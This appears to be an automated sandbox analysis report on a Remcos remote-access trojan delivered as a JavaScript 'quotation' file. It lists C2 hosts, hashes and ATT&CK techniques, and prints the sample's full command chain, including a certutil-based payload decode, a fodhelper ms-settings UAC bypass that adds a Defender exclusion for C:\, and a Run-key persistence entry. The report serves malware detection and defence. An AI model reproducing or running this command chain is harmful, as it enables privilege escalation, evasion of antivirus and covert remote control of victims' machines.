remcos | d2a3b8751afe0ca29b83b6c6200bf3405c07fb02d9d388231bfaefe9c6bfbfc0

Analysis

max time kernel
150s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
30/05/2024, 06:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Quotation (Ammunition).js
Size

113KB
MD5

8cc82a928a34916491db43f53d1e0775
SHA1

d2d030096fd57e03a0f164b4c926e368c23dbc33
SHA256

d2a3b8751afe0ca29b83b6c6200bf3405c07fb02d9d388231bfaefe9c6bfbfc0
SHA512

de229a767ed87372e74f4ce4ce47964892971cf740388e65a48a93d58ae0f7c468a520a2a0161f797fc273636f9dd0f814699fd81339cba5c668b7c78d7a17fd
SSDEEP

24:uX2kepwtBke06I965WIXBVBCBzBtZBRBgBVBtdAB/IBjBgBsBGBXBtdABDBtdABl:uGRUR06I96+q6h

Score

10^/10

remcos grace stub cloudeye execution persistence rat

Malware Config

Extracted

Family

remcos

Botnet

grace stub Cloudeye

teamfavour222.ddns.net :6767

odogwuvisual123.duckdns.org:6767

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
-FQ3W7Z
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3	4056	wscript.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation	per.exe

Executes dropped EXE 25 IoCs

pid	Process
4476	alpha.exe
3904	alpha.exe
1652	alpha.exe
4840	alpha.exe
4868	kn.exe
5044	alpha.exe
3988	alpha.exe
2944	alpha.exe
1532	alpha.exe
3940	xkn.exe
5084	alpha.exe
4976	ger.exe
4576	alpha.exe
2736	kn.exe
868	per.exe
1320	alpha.exe
860	Ping_c.pif
4124	alpha.exe
728	alpha.exe
2180	alpha.exe
4056	alpha.exe
4824	alpha.exe
1508	alpha.exe
2396	alpha.exe
4348	alpha.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Emuxedll = "C:\\Users\\Public\\Emuxedll.url"	Ping_c.pif

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
45	drive.google.com
47	drive.google.com

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Kills process with taskkill 1 IoCs

evasion

pid	Process
4564	taskkill.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\ms-settings\shell	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\ms-settings\shell\open	ger.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\""	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\ms-settings\shell\open\command	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000_Classes\ms-settings	ger.exe

Script User-Agent 5 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	39	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	42	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	44	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	47	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	51	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3940	xkn.exe
3940	xkn.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	3940	xkn.exe
Token: SeDebugPrivilege	4564	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4056 wrote to memory of 2324	4056	wscript.exe	91
PID 4056 wrote to memory of 2324	4056	wscript.exe	91
PID 2324 wrote to memory of 2396	2324	cmd.exe	93
PID 2324 wrote to memory of 2396	2324	cmd.exe	93
PID 2324 wrote to memory of 4476	2324	cmd.exe	94
PID 2324 wrote to memory of 4476	2324	cmd.exe	94
PID 2324 wrote to memory of 3904	2324	cmd.exe	95
PID 2324 wrote to memory of 3904	2324	cmd.exe	95
PID 2324 wrote to memory of 1652	2324	cmd.exe	96
PID 2324 wrote to memory of 1652	2324	cmd.exe	96
PID 1652 wrote to memory of 3148	1652	alpha.exe	97
PID 1652 wrote to memory of 3148	1652	alpha.exe	97
PID 2324 wrote to memory of 4840	2324	cmd.exe	98
PID 2324 wrote to memory of 4840	2324	cmd.exe	98
PID 4840 wrote to memory of 4868	4840	alpha.exe	99
PID 4840 wrote to memory of 4868	4840	alpha.exe	99
PID 2324 wrote to memory of 5044	2324	cmd.exe	100
PID 2324 wrote to memory of 5044	2324	cmd.exe	100
PID 5044 wrote to memory of 1600	5044	alpha.exe	101
PID 5044 wrote to memory of 1600	5044	alpha.exe	101
PID 2324 wrote to memory of 3988	2324	cmd.exe	102
PID 2324 wrote to memory of 3988	2324	cmd.exe	102
PID 3988 wrote to memory of 3876	3988	alpha.exe	103
PID 3988 wrote to memory of 3876	3988	alpha.exe	103
PID 2324 wrote to memory of 2944	2324	cmd.exe	104
PID 2324 wrote to memory of 2944	2324	cmd.exe	104
PID 2944 wrote to memory of 4940	2944	alpha.exe	105
PID 2944 wrote to memory of 4940	2944	alpha.exe	105
PID 2324 wrote to memory of 1532	2324	cmd.exe	106
PID 2324 wrote to memory of 1532	2324	cmd.exe	106
PID 1532 wrote to memory of 3940	1532	alpha.exe	107
PID 1532 wrote to memory of 3940	1532	alpha.exe	107
PID 3940 wrote to memory of 5084	3940	xkn.exe	108
PID 3940 wrote to memory of 5084	3940	xkn.exe	108
PID 5084 wrote to memory of 4976	5084	alpha.exe	109
PID 5084 wrote to memory of 4976	5084	alpha.exe	109
PID 2324 wrote to memory of 4576	2324	cmd.exe	110
PID 2324 wrote to memory of 4576	2324	cmd.exe	110
PID 4576 wrote to memory of 2736	4576	alpha.exe	111
PID 4576 wrote to memory of 2736	4576	alpha.exe	111
PID 2324 wrote to memory of 868	2324	cmd.exe	112
PID 2324 wrote to memory of 868	2324	cmd.exe	112
PID 2324 wrote to memory of 1320	2324	cmd.exe	117
PID 2324 wrote to memory of 1320	2324	cmd.exe	117
PID 1320 wrote to memory of 4564	1320	alpha.exe	119
PID 1320 wrote to memory of 4564	1320	alpha.exe	119
PID 2324 wrote to memory of 860	2324	cmd.exe	122
PID 2324 wrote to memory of 860	2324	cmd.exe	122
PID 2324 wrote to memory of 860	2324	cmd.exe	122
PID 2324 wrote to memory of 4124	2324	cmd.exe	123
PID 2324 wrote to memory of 4124	2324	cmd.exe	123
PID 2324 wrote to memory of 728	2324	cmd.exe	124
PID 2324 wrote to memory of 728	2324	cmd.exe	124
PID 2324 wrote to memory of 2180	2324	cmd.exe	125
PID 2324 wrote to memory of 2180	2324	cmd.exe	125
PID 2324 wrote to memory of 4056	2324	cmd.exe	126
PID 2324 wrote to memory of 4056	2324	cmd.exe	126
PID 2324 wrote to memory of 4824	2324	cmd.exe	127
PID 2324 wrote to memory of 4824	2324	cmd.exe	127
PID 2324 wrote to memory of 1508	2324	cmd.exe	128
PID 2324 wrote to memory of 1508	2324	cmd.exe	128
PID 2324 wrote to memory of 2396	2324	cmd.exe	129
PID 2324 wrote to memory of 2396	2324	cmd.exe	129
PID 2324 wrote to memory of 4348	2324	cmd.exe	130

C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\Quotation (Ammunition).js"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AUEEES.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2324
- - C:\Windows\System32\extrac32.exe
    C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
    3⤵
    PID:2396
- - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
    3⤵
    - Executes dropped EXE
    PID:4476
- - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
    3⤵
    - Executes dropped EXE
    PID:3904
- - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1652
  - - C:\Windows\system32\extrac32.exe
      extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
      4⤵
      PID:3148
- - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\AUEEES.bat" "C:\\Users\\Public\\Ping_c.mp4" 9
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4840
  - - C:\Users\Public\kn.exe
      C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\AUEEES.bat" "C:\\Users\\Public\\Ping_c.mp4" 9
      4⤵
      Executes dropped EXE
      PID:4868
- - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:5044
  - - C:\Windows\system32\extrac32.exe
      extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
      4⤵
      PID:1600
- - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3988
  - - C:\Windows\system32\extrac32.exe
      extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
      4⤵
      PID:3876
- - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2944
  - - C:\Windows\system32\extrac32.exe
      extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
      4⤵
      PID:4940
- - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1532
  - - C:\Users\Public\xkn.exe
      C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3940
    - - C:\Users\Public\alpha.exe
        
        "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:5084
      - C:\Users\Public\ger.exe
        
        C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
        6⤵
        Executes dropped EXE
        Modifies registry class
        
        PID:4976
- - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4576
  - - C:\Users\Public\kn.exe
      C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
      4⤵
      Executes dropped EXE
      PID:2736
- - C:\Windows \System32\per.exe
    "C:\\Windows \\System32\\per.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:868
- - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:1320
  - - C:\Windows\system32\taskkill.exe
      taskkill /F /IM SystemSettings.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:4564
- - C:\Users\Public\Libraries\Ping_c.pif
    C:\Users\Public\Libraries\Ping_c.pif
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:860
  - - C:\Windows\SysWOW64\extrac32.exe
      C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Ping_c.pif C:\\Users\\Public\\Libraries\\Emuxedll.PIF
      4⤵
      PID:884
- - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
    3⤵
    - Executes dropped EXE
    PID:4124
- - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
    3⤵
    - Executes dropped EXE
    PID:728
- - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
    3⤵
    - Executes dropped EXE
    PID:2180
- - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
    3⤵
    - Executes dropped EXE
    PID:4056
- - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
    3⤵
    - Executes dropped EXE
    PID:4824
- - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
    3⤵
    - Executes dropped EXE
    PID:1508
- - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
    3⤵
    - Executes dropped EXE
    PID:2396
- - C:\Users\Public\alpha.exe
    C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
    3⤵
    - Executes dropped EXE
    PID:4348

C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
1⤵
PID:964

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\AUEEES.bat

Filesize
4.1MB

MD5
a33d1bcae258475e7ec293f1abf928e5

SHA1
52af7e1f6ab049951df243e62a2d366383ea9561

SHA256
f2bbf781cc15b5856ade4ed875e314d4481007ce629af56b0e822e3878dd16d6

SHA512
ebaebf6b810f56b87bc7cf02bb0b4397d89263083370ef8162e24ec09d2cc1f3824ff8efe19b893470325758d74973bfb7382116c19678dca06b3e743ab4f1cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ptfkuh5v.hii.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Libraries\Ping_c.pif

Filesize
1.4MB

MD5
4ffb32f1690aa831e132e381df519300

SHA1
ae6e6a6b561b901d97479ad960888fecf08c5519

SHA256
0395b1e766415e2e204294ea212d9dc95e5f69eb142ae347a0c9903a5e56c71d

SHA512
077c69d9c612591ba28d4084c136ed647d7e1e3ec7b48ffebdabd9e7b33e4ccd458ad1cccfde36fdd815f847d2cccb323c37f0d2e9c9085bd34f1e29c5e65945

Download Submit
C:\Users\Public\Ping_c.mp4

Filesize
2.8MB

MD5
9127217563d01e011becab066e5c49d3

SHA1
e8ee9e6c3bdfd6f7bc8dad7713261881f18f37d8

SHA256
b2628395d5ba5a6b6657cd1ef351b18dd322d6ed864c38ed6584c27529140e03

SHA512
8766cb4e9c1e44f47a374160f4adda8a128f401e63695ae6dc47124b4d6bc18ee5bc8bddda0732d0171da57ea3aadfbacf8849c9504c3d34623e8ee0a06f45d9

Download Submit
C:\Users\Public\alpha.exe

Filesize
283KB

MD5
8a2122e8162dbef04694b9c3e0b6cdee

SHA1
f1efb0fddc156e4c61c5f78a54700e4e7984d55d

SHA256
b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450

SHA512
99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

Download Submit
C:\Users\Public\ger.exe

Filesize
75KB

MD5
227f63e1d9008b36bdbcc4b397780be4

SHA1
c0db341defa8ef40c03ed769a9001d600e0f4dae

SHA256
c0e25b1f9b22de445298c1e96ddfcead265ca030fa6626f61a4a4786cc4a3b7d

SHA512
101907b994d828c83587c483b4984f36caf728b766cb7a417b549852a6207e2a3fe9edc8eff5eeab13e32c4cf1417a3adccc089023114ea81974c5e6b355fed9

Download Submit
C:\Users\Public\kn.exe

Filesize
1.6MB

MD5
bd8d9943a9b1def98eb83e0fa48796c2

SHA1
70e89852f023ab7cde0173eda1208dbb580f1e4f

SHA256
8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2

SHA512
95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

Download Submit
C:\Users\Public\xkn.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Windows \System32\per.exe

Filesize
48KB

MD5
85018be1fd913656bc9ff541f017eacd

SHA1
26d7407931b713e0f0fa8b872feecdb3cf49065a

SHA256
c546e05d705ffdd5e1e18d40e2e7397f186a7c47fa5fc21f234222d057227cf5

SHA512
3e5903cf18386951c015ae23dd68a112b2f4b0968212323218c49f8413b6d508283cc6aaa929dbead853bd100adc18bf497479963dad42dfafbeb081c9035459

Download Submit
memory/860-80-0x0000000000400000-0x0000000000569000-memory.dmp

Filesize
1.4MB

Download
memory/860-87-0x0000000033940000-0x0000000034940000-memory.dmp

Filesize
16.0MB

Download
memory/860-88-0x0000000033940000-0x0000000034940000-memory.dmp

Filesize
16.0MB

Download
memory/860-91-0x0000000033940000-0x0000000034940000-memory.dmp

Filesize
16.0MB

Download
memory/860-92-0x0000000033940000-0x0000000034940000-memory.dmp

Filesize
16.0MB

Download
memory/860-95-0x0000000033940000-0x0000000034940000-memory.dmp

Filesize
16.0MB

Download
memory/860-96-0x0000000033940000-0x0000000034940000-memory.dmp

Filesize
16.0MB

Download
memory/860-99-0x0000000033940000-0x0000000034940000-memory.dmp

Filesize
16.0MB

Download
memory/860-100-0x0000000033940000-0x0000000034940000-memory.dmp

Filesize
16.0MB

Download
memory/860-103-0x0000000033940000-0x0000000034940000-memory.dmp

Filesize
16.0MB

Download
memory/860-104-0x0000000033940000-0x0000000034940000-memory.dmp

Filesize
16.0MB

Download
memory/3940-41-0x000002644C290000-0x000002644C2B2000-memory.dmp

Filesize
136KB

Download